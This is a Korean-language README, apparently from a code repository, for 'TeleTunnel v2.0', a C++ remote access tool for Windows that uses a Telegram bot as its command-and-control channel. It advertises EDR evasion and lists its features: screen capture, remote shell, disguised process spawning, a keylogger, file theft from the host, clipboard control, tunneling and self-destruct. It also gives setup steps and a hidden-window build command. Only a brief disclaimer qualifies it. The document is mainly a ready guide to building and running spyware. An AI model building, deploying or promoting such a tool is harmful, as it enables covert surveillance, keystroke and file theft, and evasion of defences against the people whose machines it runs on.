
EDR을 스텔스 c++ 텔레그램 봇과 텔레그램 자체를 C2 인터페이스로 우회하기 !
Windows용 텔레그램 기반 원격 접근 도구. 면책 조항: 소유한 시스템에서만 승인된 용도로 사용하세요! 부탁드립니다 🙇
봇에는 다음과 같은 기능이 있습니다:
ᴛᴇʟᴇᴛᴜɴɴᴇʟ ᴠ2.0
────────────────────
👤 신원: USER@HOSTNAME
🛠 정찰
├── sysinfo - 전체 시스템 보고
├── ss - 데스크탑 캡처
├── ps - 프로세스 목록
└── ls <path>- 디렉터리 탐색
⚡️ 명령 센터
├── > <cmd> - 네이티브 셸
├── spawn <PID> <cmd> - 위장 실행
├── clip get/set - 클립보드 관리자
└── kill - 자폭
💾 파일 작업
├── get <path> - 호스트에서 다운로드
├── [드래그/드롭]- 호스트로 업로드
└── drops - 업로드 목록 ($1, $LAST)
⌨️ 키로거
└── keylog <start|stop|dump|status>
📡 터널링
└── open|send|close|streams
────────────────────
nlohmann/json.hpp가 포함되어 있습니다. 이 파일은 저장소에 포함되어 있어 검색하는 수고를 덜어줍니다.텔레그램 봇 토큰 받기:
@BotFather에게 메시지를 보내고 새 봇을 만드세요.텔레그램 채팅 ID 받기:
@userinfobot에게 메시지를 보내 정확한 사용자 ID를 얻으세요.https://api.telegram.org/bot<YOUR_BOT_TOKEN>/getUpdates에 방문하여 chat 아래의 id를 찾으세요.프로젝트 구성:
config.h를 여세요."YOUR BOT TOKEN HERE"를 실제 봇 토큰으로 바꾸세요."XXXXXXXXXX"를 개인 텔레그램 사용자 ID로 바꾸세요.필요한 Windows 라이브러리가 있는지 확인하세요: wininet, ws2_32, gdiplus, ole32, iphlpapi.
GCC/MinGW 사용:
g++ -std=c++17 -O2 -mwindows -I. -Inlohmann "./TeleTunnel v2.cpp" -o TeleTunnelv2.exe -lwininet -lws2_32 -lgdiplus -lole32 -liphlpapi -static -static-libgcc -static-libstdc++